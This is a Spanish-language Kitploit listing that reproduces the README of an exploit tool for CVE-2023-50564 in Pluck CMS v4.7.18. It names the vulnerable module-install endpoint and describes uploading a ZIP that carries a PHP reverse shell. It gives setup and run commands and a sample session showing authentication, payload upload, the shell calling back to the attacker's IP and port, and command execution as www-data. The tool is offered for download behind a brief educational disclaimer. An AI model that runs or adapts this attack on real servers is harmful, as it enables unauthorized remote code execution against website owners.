Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-50564 — Este script explota la función de carga de archivos en Pluck CMS v4.7.18 para cargar un archivo PHP malicioso, permitiendo acceso remoto a través de una reverse shell. Una vez cargado, este backdoor otorga al atacante acceso al servidor con permisos de servidor web, permitiendo acciones adicionales dentro del sistema o la red. | Kitploit
Herramientas/GitHubGitHub/mrterrestrial/cve-2023-50564
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
11hace 1 añoAún no revisado

Acerca de

Este script explota la función de carga de archivos en Pluck CMS v4.7.18 para cargar un archivo PHP malicioso, permitiendo acceso remoto a través de una reverse shell. Una vez cargado, este backdoor otorga al atacante acceso al servidor con permisos de servidor web, permitiendo acciones adicionales dentro del sistema o la red.

Compartir

CVE-2023-50564 - Exploit de Pluck CMS v4.7.18

Resumen

Este script explota una vulnerabilidad de subida arbitraria de archivos autenticada en Pluck CMS v4.7.18 (CVE-2023-50564). Al aprovechar esta vulnerabilidad, un atacante autenticado puede subir un archivo PHP malicioso, permitiendo la ejecución de código arbitrario (en este caso, una reverse shell).

Detalles del Exploit

  • ID de CVE: CVE-2023-50564
  • Versión afectada: Pluck CMS v4.7.18
  • Tipo: Subida Arbitraria de Archivos Autenticada
  • Impacto: Ejecución Remota de Código (RCE)

La vulnerabilidad existe en el endpoint /admin.php?action=installmodule, que permite a un usuario autenticado subir un archivo ZIP que contiene archivos arbitrarios. Al subir un archivo PHP malicioso, este exploit establece una reverse shell hacia el atacante.

Requisitos

  • Python 3.x
  • Módulo requests: pip install requests
  • Módulo requests-toolbelt: pip install requests-toolbelt

Este script también requiere un inicio de sesión válido para la instancia de Pluck CMS, incluyendo la URL y la contraseña del objetivo.

Características del Exploit

  • Reverse Shell: El exploit sube una reverse shell PHP al objetivo y se conecta de vuelta a la máquina del atacante.
  • Ejecución interactiva de comandos: Una vez establecida la reverse shell, los comandos pueden ejecutarse de manera interactiva en el objetivo.
  • Detección de solicitudes de contraseña: El exploit detecta solicitudes de contraseña (p.ej., su, sudo -l) y permite al usuario proporcionar entrada manualmente.

Uso

Pasos para ejecutar el exploit

  1. Clonar el repositorio:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Instalar los paquetes de Python requeridos: Asegúrese de que los paquetes requeridos estén instalados:
root@kitploit:~
pip install requests requests-toolbelt
  1. Ejecutar el exploit: El script requiere cuatro entradas: la URL del objetivo, la contraseña del CMS, su dirección IP (para la reverse shell) y el puerto en el que desea escuchar.

Ejecute el exploit usando Python:

root@kitploit:~
 python3 exploit.py
  1. Proporcionar entrada cuando se solicite:
  • Ingrese la URL del objetivo (p.ej., example.com).
  • Ingrese la contraseña para la autenticación en el CMS.
  • Ingrese su dirección IP para la conexión de reverse shell.
  • Ingrese el puerto para escuchar la reverse shell.
  1. Shell interactiva: Una vez establecida la reverse shell, se le presentará un prompt Shell> para interactuar con el sistema objetivo.

Ejemplo:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Desglose del Exploit

  • Autenticación: El script inicia sesión en el CMS usando las credenciales proporcionadas.
  • Subida de archivos: Crea un archivo ZIP que contiene una reverse shell PHP y lo sube al endpoint vulnerable (/admin.php?action=installmodule).
  • Reverse Shell: El script activa el archivo PHP subido, estableciendo una conexión reverse shell hacia la máquina del atacante.

Detalles de CVE

  • ID de CVE: CVE-2023-50564
  • Endpoint vulnerable: /admin.php?action=installmodule
  • Versión vulnerable: Pluck CMS v4.7.18
  • Tipo: Subida Arbitraria de Archivos Autenticada

Descargo de responsabilidad

Este script está destinado a fines educativos y hacking ético. Solo debe usarse en entornos donde tenga permiso explícito para realizar pruebas. El autor no se responsabiliza por el mal uso de esta herramienta.

Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte Licencia MIT para más detalles.

Contribuciones

Siéntase libre de bifurcar el repositorio y enviar pull requests. Para cualquier problema o solicitud de función, abra un issue en GitHub.

Descargar herramienta